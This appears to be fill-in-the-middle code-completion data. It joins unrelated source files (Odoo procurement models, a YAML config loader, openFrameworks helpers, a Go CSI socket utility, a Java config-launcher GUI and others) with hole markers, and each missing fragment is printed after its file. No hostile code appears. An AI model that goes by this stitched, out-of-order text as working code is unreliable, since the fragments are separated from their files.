PROCUREMENT_PRIORITIES = [('0', 'Not urgent'), ('1', 'Normal'), ('2', 'Urgent'), ('3', 'Very Urgent')]
class ProcurementGroup(models.Model):
'''
The procurement group class is used to group products together
when computing procurements. (tasks, physical products, ...)
The goal is that when you have one sale order with several products,
and the products are pulled from the same or from several location(s), the
moves stay grouped into pickings that represent the sale order.
Used in: sales order (to group delivery order lines like the so), pull/push
rules (to pack like the delivery order), on orderpoints (e.g. for wave picking
all the similar products together).
Grouping is made only if the source and the destination are the same.
Suppose you have 4 lines on a picking from Output where 2 lines will need
to come from Input (crossdock) and 2 lines coming from Stock -> Output. As
the four procurement orders will have the same group ids from the SO, the
move from input will have a stock.picking with 2 grouped lines and the move
from stock will have 2 grouped lines also.
The name is usually the name of the original document (sale order) or a
sequence computed if created manually.
'''
_name = 'procurement.group'
_description = 'Procurement Requisition'
_order = "id desc"
name = fields.Char(
'Reference',
default=lambda self: self.env['ir.sequence'].next_by_code('procurement.group') or '',
required=True)
move_type = fields.Selection([
('direct', 'Partial'),
('one', 'All at once')], string='Delivery Type', default='direct',
required=True)
procurement_ids = fields.One2many('procurement.order', 'group_id', 'Procurements')
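# Illustrative sketch (not part of the original module; the create() values are
# hypothetical): procurements that share a group typically come from the same
# sale order, so their resulting stock moves can later be merged into a single
# picking.
#
#   group = env['procurement.group'].create({'name': 'SO0042', 'move_type': 'direct'})
#   for line in sale_order_lines:  # hypothetical iterable of order lines
#       env['procurement.order'].create({
#           'name': line.name,
#           'product_id': line.product_id.id,
#           'product_qty': line.product_uom_qty,
#           'product_uom': line.product_uom.id,
#           'group_id': group.id,
#       })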
class ProcurementRule(models.Model):
''' A rule describes what a procurement should do; produce, buy, move, ... '''
_name = 'procurement.rule'
_description = "Procurement Rule"
_order = "name"
name = fields.Char(
'Name', required=True, translate=True,
help="This field will fill the packing origin and the name of its moves")
active = fields.Boolean(
'Active', default=True,
help="If unchecked, it will allow you to hide the rule without removing it.")
group_propagation_option = fields.Selection([
('none', 'Leave Empty'),
('propagate', 'Propagate'),
('fixed', 'Fixed')], string="Propagation of Procurement Group", default='propagate')
group_id = fields.Many2one('procurement.group', 'Fixed Procurement Group')
action = fields.Selection(
selection='_get_action', string='Action',
required=True)
sequence = fields.Integer('Sequence', default=20)
company_id = fields.Many2one('res.company', 'Company')
@api.model
def _get_action(self):
return []
class ProcurementOrder(models.Model):
""" Procurement Orders """
_name = "procurement.order"
_description = "Procurement"
_order = 'priority desc, date_planned, id asc'
_inherit = ['mail.thread','ir.needaction_mixin']
name = fields.Text('Description', required=True)
origin = fields.Char('Source Document', help="Reference of the document that created this Procurement. This is automatically completed by Odoo.")
company_id = fields.Many2one(
'res.company', 'Company',
default=lambda self: self.env['res.company']._company_default_get('procurement.order'),
required=True)
# These two fields are used for scheduling
priority = fields.Selection(
PROCUREMENT_PRIORITIES, string='Priority', default='1',
required=True, index=True, track_visibility='onchange')
date_planned = fields.Datetime(
'Scheduled Date', default=fields.Datetime.now,
required=True, index=True, track_visibility='onchange')
group_id = fields.Many2one('procurement.group', 'Procurement Group')
rule_id = fields.Many2one(
'procurement.rule', 'Rule',
track_visibility='onchange',
help="Chosen rule for the procurement resolution. Usually chosen by the system but can be manually set by the procurement manager to force an unusual behavior.")
product_id = fields.Many2one(
'product.product', 'Product',
readonly=True, required=True,
states={'confirmed': [('readonly', False)]})
product_qty = fields.Float(
'Quantity',
digits=dp.get_precision('Product Unit of Measure'),
readonly=True, required=True,
states={'confirmed': [('readonly', False)]})
product_uom = fields.Many2one(
'product.uom', 'Product Unit of Measure',
readonly=True, required=True,
states={'confirmed': [('readonly', False)]})
state = fields.Selection([
('cancel', 'Cancelled'),
('confirmed', 'Confirmed'),
('exception', 'Exception'),
('running', 'Running'),
('done', 'Done')], string='Status', default='confirmed',
copy=False, required=True, track_visibility='onchange')
@api.model
def _needaction_domain_get(self):
return [('state', '=', 'exception')]
@api.model
def create(self, vals):
procurement = super(ProcurementOrder, self).create(vals)
if not self._context.get('procurement_autorun_defer'):
procurement.run()
return procurement
@api.multi
def unlink(self):
if any(procurement.state == 'cancel' for procurement in self):
raise UserError(_('You cannot delete procurements that are in cancel state.'))
return super(ProcurementOrder, self).unlink()
@api.multi
def do_view_procurements(self):
'''
This function returns an action that displays the existing procurement orders
of the same procurement group as the given ids.
'''
action = self.env.ref('procurement.do_view_procurements').read()[0]
action['domain'] = [('group_id', 'in', self.mapped('group_id').ids)]
return action
@api.onchange('product_id')
def onchange_product_id(self):<|fim▁hole|> self.product_uom = self.product_id.uom_id.id
@api.multi
def cancel(self):
to_cancel = self.filtered(lambda procurement: procurement.state != 'done')
if to_cancel:
return to_cancel.write({'state': 'cancel'})
@api.multi
def reset_to_confirmed(self):
return self.write({'state': 'confirmed'})
@api.multi
def run(self, autocommit=False):
# TDE FIXME: avoid browsing everything -> avoid prefetching ?
for procurement in self:
# we intentionally do the browse under the for loop to avoid caching all ids which would be resource greedy
# and useless as we'll make a refresh later that will invalidate all the cache (and thus the next iteration
# will fetch all the ids again)
if procurement.state not in ("running", "done"):
try:
if procurement._assign():
res = procurement._run()
if res:
procurement.write({'state': 'running'})
else:
procurement.write({'state': 'exception'})
else:
procurement.message_post(body=_('No rule matching this procurement'))
procurement.write({'state': 'exception'})
if autocommit:
self.env.cr.commit()
except OperationalError:
if autocommit:
self.env.cr.rollback()
continue
else:
raise
return True
@api.multi
@api.returns('self', lambda procurements: [procurement.id for procurement in procurements])
def check(self, autocommit=False):
# TDE FIXME: check should not do something, just check
procurements_done = self.env['procurement.order']
for procurement in self:
try:
result = procurement._check()
if result:
procurements_done += procurement
if autocommit:
self.env.cr.commit()
except OperationalError:
if autocommit:
self.env.cr.rollback()
continue
else:
raise
if procurements_done:
procurements_done.write({'state': 'done'})
return procurements_done
#
# Method to overwrite in different procurement modules
#
@api.multi
def _find_suitable_rule(self):
'''This method returns a procurement.rule that depicts what to do with the given procurement
in order to complete its needs. It returns False if no suiting rule is found.
:rtype: int or False
'''
return False
@api.multi
def _assign(self):
'''This method checks what to do with the given procurement in order to complete its needs.
It returns False if no solution is found, otherwise it stores the matching rule (if any) and
returns True.
:rtype: boolean
'''
# if the procurement already has a rule assigned, we keep it (it has a higher priority as it may have been chosen manually)
if self.rule_id:
return True
elif self.product_id.type not in ('service', 'digital'):
rule = self._find_suitable_rule()
if rule:
self.write({'rule_id': rule.id})
return True
return False
@api.multi
def _run(self):
'''This method implements the resolution of the given procurement
:returns: True if the resolution of the procurement was a success, False otherwise to set it in exception
'''
return True
@api.multi
def _check(self):
'''Returns True if the given procurement is fulfilled, False otherwise
:rtype: boolean
'''
return False
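# Illustrative sketch (hypothetical downstream module, not part of this file):
# warehouse/purchase modules extend the hooks above by inheriting the model,
# for example:
#
#   class StockProcurementOrder(models.Model):
#       _inherit = 'procurement.order'
#
#       @api.multi
#       def _run(self):
#           # create the stock move / purchase order that fulfils the procurement
#           return super(StockProcurementOrder, self)._run()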
#
# Scheduler
#
@api.model
def run_scheduler(self, use_new_cursor=False, company_id=False):
'''
Call the scheduler to check the procurement order. This is intended to be done for all existing companies at
the same time, so we're running all the methods as SUPERUSER to avoid intercompany and access rights issues.
@param use_new_cursor: if set, use a dedicated cursor and auto-commit after processing each procurement.
This is appropriate for batch jobs only.
@return: Dictionary of values
'''
ProcurementSudo = self.env['procurement.order'].sudo()
try:
if use_new_cursor:
cr = registry(self._cr.dbname).cursor()
self = self.with_env(self.env(cr=cr)) # TDE FIXME
# Run confirmed procurements
procurements = ProcurementSudo.search([('state', '=', 'confirmed')] + (company_id and [('company_id', '=', company_id)] or []))
while procurements:
procurements.run(autocommit=use_new_cursor)
if use_new_cursor:
self.env.cr.commit()
procurements = ProcurementSudo.search([('id', 'not in', procurements.ids), ('state', '=', 'confirmed')] + (company_id and [('company_id', '=', company_id)] or []))
# Check done procurements
procurements = ProcurementSudo.search([('state', '=', 'running')] + (company_id and [('company_id', '=', company_id)] or []))
while procurements:
procurements.check(autocommit=use_new_cursor)
if use_new_cursor:
self.env.cr.commit()
procurements = ProcurementSudo.search([('id', 'not in', procurements.ids), ('state', '=', 'running')] + (company_id and [('company_id', '=', company_id)] or []))
finally:
if use_new_cursor:
try:
self.env.cr.close()
except Exception:
pass
return {}<|fim▁end|>
|
""" Finds UoM of changed product. """
if self.product_id:
|
<|file_name|>config.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>from ruamel.yaml import YAML
from six import iteritems
_required = ['server']
class Config(object):
def __init__(self, configFile):
self.configFile = configFile
self._configData = {}
self.yaml = YAML()
self._inBaseConfig = []
def loadConfig(self):
configData = self._readConfig(self.configFile)
self._validate(configData)
self._configData = configData
def _readConfig(self, fileName):
try:
with open(fileName, mode='r') as config:
configData = self.yaml.load(config)
if not configData:
configData = {}
# if this is the base server config, store what keys we loaded
if fileName == self.configFile:
self._inBaseConfig = list(configData.keys())
except Exception as e:
raise ConfigError(fileName, e)
if 'import' not in configData:
return configData
for fname in configData['import']:
includeConfig = self._readConfig('configs/{}.yaml'.format(fname))
for key, val in iteritems(includeConfig):
# not present in base config, just assign it
if key not in configData:
configData[key] = val
continue
# skip non-collection types that are already set
if isinstance(configData[key], (str, int)):
continue
if isinstance(val, str):
raise ConfigError(fname, 'The included config file tried '
'to merge a non-string with a '
'string')
try:
iter(configData[key])
iter(val)
except TypeError:
# not a collection, so just don't merge them
pass
else:
try:
# merge with + operator
configData[key] += val
except TypeError:
# dicts can't merge with +
try:
for subKey, subVal in iteritems(val):
if subKey not in configData[key]:
configData[key][subKey] = subVal
except (AttributeError, TypeError):
# if either of these, they weren't both dicts.
raise ConfigError(fname, 'The variable {!r} could '
'not be successfully '
'merged'.format(key))
return configData
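# Illustrative sketch (hypothetical file names and keys, not from the original
# project): with a base config containing
#
#   import: [shared]
#   server: irc.example.org
#   channels: ['#main']
#
# and configs/shared.yaml containing
#
#   channels: ['#extra']
#   nickname: examplebot
#
# _readConfig() keeps the base 'server' value, merges the lists into
# channels == ['#main', '#extra'] and adds the missing 'nickname' key.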
def writeConfig(self):
# filter the configData to only those keys
# that were present in the base server config,
# or have been modified at runtime
configData = copy.deepcopy(self._configData)
to_delete = set(configData.keys()).difference(self._inBaseConfig)
for key in to_delete:
del configData[key]
# write the filtered configData
try:
with open(self.configFile, mode='w') as config:
self.yaml.dump(configData, config)
except Exception as e:
raise ConfigError(self.configFile, e)
def getWithDefault(self, key, default=None):
if key in self._configData:
return self._configData[key]
return default
def _validate(self, configData):
for key in _required:
if key not in configData:
raise ConfigError(self.configFile, 'Required item {!r} was not found in the config.'.format(key))
def __len__(self):
return len(self._configData)
def __iter__(self):
return iter(self._configData)
def __getitem__(self, key):
return self._configData[key]
def __setitem__(self, key, value):
# mark this key to be saved in the server config
if key not in self._inBaseConfig:
self._inBaseConfig.append(key)
self._configData[key] = value
def __contains__(self, key):
return key in self._configData
class ConfigError(Exception):
def __init__(self, configFile, message):
self.configFile = configFile
self.message = message
def __str__(self):
return 'An error occurred while reading config file {}: {}'.format(self.configFile,
self.message)<|fim▁end|>
|
import copy
|
<|file_name|>Autocomplete.java<|end_file_name|><|fim▁begin|>package site;
public class Autocomplete {
<|fim▁hole|>
public Autocomplete(String label, String value) {
this.label = label;
this.value = value;
}
public final String getLabel() {
return this.label;
}
public final String getValue() {
return this.value;
}
}<|fim▁end|>
|
private final String label;
private final String value;
|
<|file_name|>gels.hpp<|end_file_name|><|fim▁begin|>#ifndef NT2_LINALG_INCLUDE_FUNCTIONS_SCALAR_GELS_HPP_INCLUDED
#define NT2_LINALG_INCLUDE_FUNCTIONS_SCALAR_GELS_HPP_INCLUDED<|fim▁hole|>#include <nt2/linalg/functions/gels.hpp>
#endif<|fim▁end|>
| |
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>use std::env;
use std::process;
use minigrep::Config;
fn main() {
let args: Vec<String> = env::args().collect();
let config = Config::new(&args).unwrap_or_else(|err| {
eprintln!("Problem parsing arguments: {}", err);
process::exit(1);
});
if let Err(e) = minigrep::run(config) {
eprintln!("Application error: {}", e);
process::exit(1);<|fim▁hole|><|fim▁end|>
|
}
}
|
<|file_name|>exceptions.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""
rdd.exceptions
~~~~~~~~~~~~~~
This module contains the exceptions raised by rdd.
"""
from requests.exceptions import *
class ReadabilityException(RuntimeError):
"""Base class for Readability exceptions."""
<|fim▁hole|>
class ShortenerError(ReadabilityException):
"""Failed to shorten URL."""
class MetadataError(ReadabilityException):
"""Failed to retrieve metadata."""<|fim▁end|>
| |
<|file_name|>Helpers.cpp<|end_file_name|><|fim▁begin|>#include "ofxCv/Helpers.h"
#include "ofxCv/Utilities.h"
namespace ofxCv {
using namespace cv;
ofMatrix4x4 makeMatrix(Mat rotation, Mat translation) {
Mat rot3x3;
if(rotation.rows == 3 && rotation.cols == 3) {
rot3x3 = rotation;
} else {
Rodrigues(rotation, rot3x3);
}
double* rm = rot3x3.ptr<double>(0);
double* tm = translation.ptr<double>(0);
return ofMatrix4x4(rm[0], rm[3], rm[6], 0.0f,
rm[1], rm[4], rm[7], 0.0f,
rm[2], rm[5], rm[8], 0.0f,
tm[0], tm[1], tm[2], 1.0f);
}
void drawMat(Mat& mat, float x, float y) {
drawMat(mat, x, y, mat.cols, mat.rows);
}
// experimental special case of copying into ofTexture, which acts different
// might be able to rewrite this in terms of getDepth() but right now this
// function loses precision with CV_32F -> CV_8U
template <class S>
void copy(S& src, ofTexture& tex) {
Mat mat = toCv(src);
int glType;
Mat buffer;
if(mat.depth() != CV_8U) {
copy(mat, buffer, CV_8U);
} else {
buffer = mat;
}
if(mat.channels() == 1) {
glType = GL_LUMINANCE;
} else {
glType = GL_RGB;
}
int w = buffer.cols;
int h = buffer.rows;
tex.allocate(w, h, glType);
tex.loadData(buffer.ptr(), w, h, glType);
}
void drawMat(Mat& mat, float x, float y, float width, float height) {
if(mat.empty()) {
return;
}
ofTexture tex;
copy(mat, tex);
tex.draw(x, y, width, height);
}
void applyMatrix(const ofMatrix4x4& matrix) {
glMultMatrixf((GLfloat*) matrix.getPtr());
}
int forceOdd(int x) {
return (x / 2) * 2 + 1;
}
int findFirst(const Mat& arr, unsigned char target) {
for(unsigned int i = 0; i < arr.rows; i++) {
if(arr.at<unsigned char>(i) == target) {
return i;
}
}
return 0;
}
int findLast(const Mat& arr, unsigned char target) {
for(int i = arr.rows - 1; i >= 0; i--) {
if(arr.at<unsigned char>(i) == target) {
return i;
}
}
return 0;
}
float weightedAverageAngle(const vector<Vec4i>& lines) {
float angleSum = 0;
ofVec2f start, end;
float weights = 0;
for(unsigned int i = 0; i < lines.size(); i++) {
start.set(lines[i][0], lines[i][1]);
end.set(lines[i][2], lines[i][3]);
ofVec2f diff = end - start;
float length = diff.length();
float weight = length * length;
float angle = atan2f(diff.y, diff.x);
angleSum += angle * weight;
weights += weight;
}
return angleSum / weights;
}
vector<cv::Point2f> getConvexPolygon(const vector<cv::Point2f>& convexHull, int targetPoints) {
vector<cv::Point2f> result = convexHull;
static const unsigned int maxIterations = 16;
static const double infinity = numeric_limits<double>::infinity();
double minEpsilon = 0;
double maxEpsilon = infinity;
double curEpsilon = 16; // good initial guess
// unbounded binary search to simplify the convex hull until it's targetPoints
if(result.size() > (unsigned int) targetPoints) {
for(unsigned int i = 0; i < maxIterations; i++) {
approxPolyDP(Mat(convexHull), result, curEpsilon, true);
if(result.size() == targetPoints) {
break;
}
if(result.size() > targetPoints) {
minEpsilon = curEpsilon;
if(maxEpsilon == infinity) {
curEpsilon = curEpsilon * 2;
} else {
curEpsilon = (maxEpsilon + minEpsilon) / 2;
}
}
if(result.size() < targetPoints) {
maxEpsilon = curEpsilon;<|fim▁hole|> }
}
return result;
}
void drawHighlightString(string text, ofPoint position, ofColor background, ofColor foreground) {
drawHighlightString(text, position.x, position.y, background, foreground);
}
void drawHighlightString(string text, int x, int y, ofColor background, ofColor foreground) {
vector<string> lines = ofSplitString(text, "\n");
int textLength = 0;
for(unsigned int i = 0; i < lines.size(); i++) {
// tabs are not rendered
int tabs = count(lines[i].begin(), lines[i].end(), '\t');
int curLength = lines[i].length() - tabs;
// after the first line, everything is indented with one space
if(i > 0) {
curLength++;
}
if(curLength > textLength) {
textLength = curLength;
}
}
int padding = 4;
int fontSize = 8;
float leading = 1.7;
int height = lines.size() * fontSize * leading - 1;
int width = textLength * fontSize;
#ifdef TARGET_OPENGLES
// This needs to be refactored to support OpenGLES
// Else it will work correctly
#else
glPushAttrib(GL_DEPTH_BUFFER_BIT);
glDisable(GL_DEPTH_TEST);
ofPushStyle();
ofSetColor(background);
ofFill();
ofRect(x, y, width + 2 * padding, height + 2 * padding);
ofSetColor(foreground);
ofNoFill();
ofPushMatrix();
ofTranslate(padding, padding);
ofDrawBitmapString(text, x + 1, y + fontSize + 2);
ofPopMatrix();
ofPopStyle();
glPopAttrib();
#endif
}
}<|fim▁end|>
|
curEpsilon = (maxEpsilon + minEpsilon) / 2;
}
|
<|file_name|>util.go<|end_file_name|><|fim▁begin|>// Copyright 2018 The OpenSDS Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package util
import (
"errors"
"log"
"net"
"os"
"path"
"reflect"
"regexp"
"strings"
)
// getProtoandAdd return protocal and address
func getProtoAndAdd(target string) (string, string) {
reg := `(?i)^((?:(?:tcp|udp|ip)[46]?)|` + `(?:unix(?:gram|packet)?))://(.+)$`
t := regexp.MustCompile(reg).FindStringSubmatch(target)
return t[1], t[2]
}
func PathExists(path string) (bool, error) {
_, err := os.Stat(path)
if err == nil {
return true, nil
}
if os.IsNotExist(err) {
return false, nil
}
return false, err
}
// getCSIEndPoint from environment variable
func getCSIEndPoint(csiEndpoint string) (string, error) {
// example: CSI_ENDPOINT=unix://path/to/unix/domain/socket.sock
csiEndpoint = strings.TrimSpace(csiEndpoint)
if csiEndpoint == "" {
err := errors.New("csi endpoint is empty")
log.Fatalf("%v", err)
return csiEndpoint, err
}
return csiEndpoint, nil
}
// GetCSIEndPointListener from endpoint
func GetCSIEndPointListener(csiEndpoint string) (net.Listener, error) {
target, err := getCSIEndPoint(csiEndpoint)
if err != nil {
return nil, err
}
proto, addr := getProtoAndAdd(target)
log.Printf("proto: %s addr: %s", proto, addr)<|fim▁hole|> // clean up previous sock file.
os.RemoveAll(addr)
log.Printf("remove sock file: %s", addr)
// Need to make directory at the first time the csi service runs.
dir := path.Dir(addr)
if exist, _ := PathExists(dir); !exist {
os.MkdirAll(dir, 0755)
}
}
return net.Listen(proto, addr)
}
// Contained ...
func Contained(obj, target interface{}) bool {
targetValue := reflect.ValueOf(target)
switch reflect.TypeOf(target).Kind() {
case reflect.Slice, reflect.Array:
for i := 0; i < targetValue.Len(); i++ {
if targetValue.Index(i).Interface() == obj {
return true
}
}
case reflect.Map:
if targetValue.MapIndex(reflect.ValueOf(obj)).IsValid() {
return true
}
default:
return false
}
return false
}<|fim▁end|>
|
if strings.HasPrefix(proto, "unix") {
|
<|file_name|>ConfigLauncherGUI.java<|end_file_name|><|fim▁begin|>package com.tle.configmanager;
import com.dytech.gui.ComponentHelper;
import com.thoughtworks.xstream.XStream;
import com.tle.common.Check;
import java.awt.Container;
import java.awt.Dimension;
import java.awt.event.ActionEvent;
import java.awt.event.ActionListener;
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.FileReader;
import java.io.FileWriter;
import java.io.IOException;
import java.io.Reader;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Comparator;
import java.util.List;
import javax.swing.JButton;
import javax.swing.JComboBox;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JSeparator;
import net.miginfocom.swing.MigLayout;
import org.apache.commons.configuration.ConfigurationException;
import org.apache.commons.io.FileUtils;
// Author: Andrew Gibb
@SuppressWarnings({"serial", "nls"})
public class ConfigLauncherGUI extends JFrame implements ActionListener {
public static final String MANDATORY_CONFIG = "mandatory-config.properties";
public static final String OPTIONAL_CONFIG = "optional-config.properties";
public static final String HIBERNATE_CONFIG = "hibernate.properties";
public static final String LOGGING_CONFIG = "learningedge-log4j.properties";
public static final String IMAGEMAGICK_CONFIG =
"plugins/com.tle.core.imagemagick/config.properties.unresolved";
public static final String HIKARI_CONFIG = "hikari.properties";
private final String TITLE = "TLE Configuration Manager";
private final String PATH = "./configs/";
private final String ORACLE = "oracle";
private final String POSTGRESQL = "postgresql";
private final String MSSQL = "ms sql";
private final String source;
private final String destination;
private JLabel lblConfig;
private JComboBox<ConfigProfile> cmbConfigs;
private JButton btnNew, btnEdit, btnApply, btnDelete;
private JSeparator sep;
private List<ConfigProfile> configs;
public ConfigLauncherGUI(String source, String destination) {
setTitle(TITLE);
setupGUI();
setResizable(false);
setDefaultCloseOperation(EXIT_ON_CLOSE);
this.source = source;
this.destination = destination;
// Set a minimum width...leave the height to the pack...
setMinimumSize(new Dimension(300, 0));
pack();
ComponentHelper.centreOnScreen(this);
// Updated combo box containing profiles
updateConfigs();
}
// Sets up the GUI for managing/loading the configuration profiles
private void setupGUI() {
Container contents = getContentPane();
contents.setLayout(new MigLayout("wrap 3", "[grow][grow][grow]"));
configs = new ArrayList<ConfigProfile>();
lblConfig = new JLabel("Configurations: ");
cmbConfigs = new JComboBox<ConfigProfile>();
btnNew = new JButton("New");
btnNew.addActionListener(this);
btnApply = new JButton("Apply Configuration");
btnApply.addActionListener(this);
btnEdit = new JButton("Edit");
btnEdit.addActionListener(this);
sep = new JSeparator();
btnDelete = new JButton("Delete");
btnDelete.addActionListener(this);
contents.add(lblConfig, "growx, spanx 3");
contents.add(cmbConfigs, "growx, spanx 3");
contents.add(btnNew, "growx, center");<|fim▁hole|> }
// Updates the available configuration profiles
public void updateConfigs() {
File srcDir = new File(PATH);
File[] configFiles = srcDir.listFiles();
Reader rdr;
cmbConfigs.removeAllItems();
configs.clear();
if (configFiles != null) {
for (File f : configFiles) {
if (f.isFile()) {
XStream xstream = new XStream();
try {
rdr = new BufferedReader(new FileReader(f));
ConfigProfile prof = (ConfigProfile) xstream.fromXML(rdr);
configs.add(prof);
rdr.close();
} catch (IOException e) {
throw new RuntimeException(e);
}
}
}
Collections.sort(
configs,
new Comparator<ConfigProfile>() {
@Override
public int compare(ConfigProfile o1, ConfigProfile o2) {
return o1.getProfName().compareToIgnoreCase(o2.getProfName());
}
});
for (ConfigProfile prof : configs) {
cmbConfigs.addItem(prof);
}
}
if (configs.isEmpty()) {
btnEdit.setEnabled(false);
btnApply.setEnabled(false);
btnDelete.setEnabled(false);
} else {
btnEdit.setEnabled(true);
btnApply.setEnabled(true);
btnDelete.setEnabled(true);
}
}
@Override
public void actionPerformed(ActionEvent e) {
if (e.getSource() == btnNew) {
addProfile();
} else if (e.getSource() == btnEdit) {
editProfile();
} else if (e.getSource() == btnDelete) {
deleteProfile();
} else if (e.getSource() == btnApply) {
try {
loadProfile();
} catch (Exception ex) {
JOptionPane.showMessageDialog(
null,
"Error loading configuration: \n" + ex.getMessage(),
"Load Failed",
JOptionPane.ERROR_MESSAGE);
}
}
}
// Adds a new profile which is either a clone of an existing profile or is
// blank
private void addProfile() {
ConfigEditorGUI confEd = null;
if (configs != null && cmbConfigs.getSelectedItem() != null) {
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
int result =
JOptionPane.showConfirmDialog(
null,
"Do you want to clone the currently selected configuration?: "
+ selectedProf.getProfName(),
"Clone Confirmation",
JOptionPane.YES_NO_OPTION);
if (result == JOptionPane.YES_OPTION) {
confEd = new ConfigEditorGUI(selectedProf, "copy");
} else {
confEd = new ConfigEditorGUI();
}
} else {
confEd = new ConfigEditorGUI();
}
confEd.setModal(true);
confEd.setVisible(true);
if (confEd.getResult() == ConfigEditorGUI.RESULT_SAVE) {
updateConfigs();
}
}
// Edits and existing profile
private void editProfile() {
int index = cmbConfigs.getSelectedIndex();
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
ConfigEditorGUI confEd = new ConfigEditorGUI(selectedProf);
confEd.setModal(true);
confEd.setVisible(true);
if (confEd.getResult() == ConfigEditorGUI.RESULT_SAVE) {
updateConfigs();
cmbConfigs.setSelectedIndex(index);
}
}
// Deletes a configuration profile
private void deleteProfile() {
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
File toDel = new File(PATH + selectedProf.getProfName() + ".xml");
int result =
JOptionPane.showConfirmDialog(
null,
"Are you sure you want to delete this configuration?: " + selectedProf.getProfName(),
"Delete Confirmation",
JOptionPane.YES_NO_OPTION);
if (result == JOptionPane.YES_OPTION) {
boolean success = toDel.delete();
if (!success) {
JOptionPane.showMessageDialog(
null,
"Unable to delete configuration: " + selectedProf.getProfName(),
"Delete Failed",
JOptionPane.ERROR_MESSAGE);
}
}
updateConfigs();
}
// Loads a profile (SUPER HACKISH)
private void loadProfile() throws FileNotFoundException, IOException, ConfigurationException {
ConfigProfile selectedProf = (ConfigProfile) cmbConfigs.getSelectedItem();
File srcDir = new File(source);
// Remove Current Configuration Files
File destDir = new File(destination);
FileUtils.deleteDirectory(destDir);
// Create Destination
destDir.mkdir();
// Copy Required Files (Database Specific)
boolean oracleSelected = selectedProf.getDbtype().equalsIgnoreCase(ORACLE);
if (oracleSelected) {
org.apache.commons.io.FileUtils.copyFile(
new File(srcDir + "/hibernate.properties.oracle"),
new File(destDir + "/hibernate.properties"));
} else if (selectedProf.getDbtype().equalsIgnoreCase(POSTGRESQL)) {
FileUtils.copyFile(
new File(srcDir + "/hibernate.properties.postgresql"),
new File(destDir + "/hibernate.properties"));
} else if (selectedProf.getDbtype().equalsIgnoreCase(MSSQL)) {
FileUtils.copyFile(
new File(srcDir + "/hibernate.properties.sqlserver"),
new File(destDir + "/hibernate.properties"));
}
// Mandatory / Optional / Logging
FileUtils.copyFile(
new File(srcDir + "/mandatory-config.properties"),
new File(destDir + "/mandatory-config.properties"));
FileUtils.copyFile(
new File(srcDir + "/optional-config.properties"),
new File(destDir + "/optional-config.properties"));
// Copy custom development logging file
FileUtils.copyFile(
new File("./learningedge-log4j.properties"),
new File(destDir + "/learningedge-log4j.properties"));
// Other Miscellaneous Files
FileUtils.copyFile(
new File(srcDir + "/en-stopWords.txt"), new File(destDir + "/en-stopWords.txt"));
FileUtils.copyFile(
new File(srcDir + "/" + HIKARI_CONFIG), new File(destDir + "/" + HIKARI_CONFIG));
// Plugins Folder
FileUtils.copyDirectoryToDirectory(new File(srcDir + "/plugins"), destDir);
// Edit Hibernate Properties
String hibProp = readFile(destination + "/" + HIBERNATE_CONFIG);
hibProp = hibProp.replace("${datasource/host}", selectedProf.getHost());
hibProp = hibProp.replace("${datasource/port}", selectedProf.getPort());
hibProp = hibProp.replace("${datasource/database}", selectedProf.getDatabase());
hibProp = hibProp.replace("${datasource/username}", selectedProf.getUsername());
hibProp = hibProp.replace("${datasource/password}", selectedProf.getPassword());
hibProp =
hibProp.replace(
"${datasource/schema}",
oracleSelected ? "hibernate.default_schema = " + selectedProf.getUsername() : "");
writeFile(destination + "/hibernate.properties", hibProp);
// Edit Mandatory Properties
PropertyEditor mandProps = new PropertyEditor();
mandProps.load(new File(destination + "/" + MANDATORY_CONFIG));
String http = selectedProf.getHttp();
String portFromUrl = selectedProf.getAdminurl().split(":")[1];
mandProps.setProperty(
"http.port",
!Check.isEmpty(http) ? http : !Check.isEmpty(portFromUrl) ? portFromUrl : "80");
String https = selectedProf.getHttps();
if (!Check.isEmpty(https)) {
mandProps.setProperty("https.port", https);
}
String ajp = selectedProf.getAjp();
if (!Check.isEmpty(https)) {
mandProps.setProperty("ajp.port", ajp);
}
mandProps.setProperty("filestore.root", selectedProf.getFilestore());
mandProps.setProperty("java.home", selectedProf.getJavahome());
mandProps.setProperty("admin.url", selectedProf.getAdminurl());
mandProps.setProperty("freetext.index.location", selectedProf.getFreetext());
mandProps.setProperty("freetext.stopwords.file", selectedProf.getStopwords());
String reporting = selectedProf.getReporting();
if (!Check.isEmpty(reporting)) {
mandProps.setProperty("reporting.workspace.location", reporting);
}
mandProps.setProperty("plugins.location", selectedProf.getPlugins());
mandProps.save(new File(destination + "/" + MANDATORY_CONFIG));
// Edit Optional Properties
String optProp = readFile(destination + "/" + OPTIONAL_CONFIG);
if (selectedProf.isDevinst()) {
optProp =
optProp.replace(
"#conversionService.disableConversion = false",
"conversionService.disableConversion = true");
optProp =
optProp.replace(
"conversionService.conversionServicePath = ${install.path#t\\/}/conversion/conversion-service.jar",
"#conversionService.conversionServicePath =");
optProp =
optProp.replace("#pluginPathResolver.wrappedClass", "pluginPathResolver.wrappedClass");
} else {
optProp =
optProp.replace(
"${install.path#t\\/}/conversion/conversion-service.jar",
selectedProf.getConversion());
}
writeFile(destination + "/optional-config.properties", optProp);
    // Edit ImageMagick Properties (MORE HAX...)
File imgmgk = new File(destination + "/" + IMAGEMAGICK_CONFIG);
PropertyEditor magickProps = new PropertyEditor();
magickProps.load(imgmgk);
magickProps.setProperty("imageMagick.path", selectedProf.getImagemagick());
magickProps.save(new File((destination + "/" + IMAGEMAGICK_CONFIG).replace(".unresolved", "")));
imgmgk.delete();
JOptionPane.showMessageDialog(
null,
"The configuration: " + selectedProf.getProfName() + " has been successfully loaded.",
"Load Success",
JOptionPane.INFORMATION_MESSAGE);
}
// Reads a file into a string
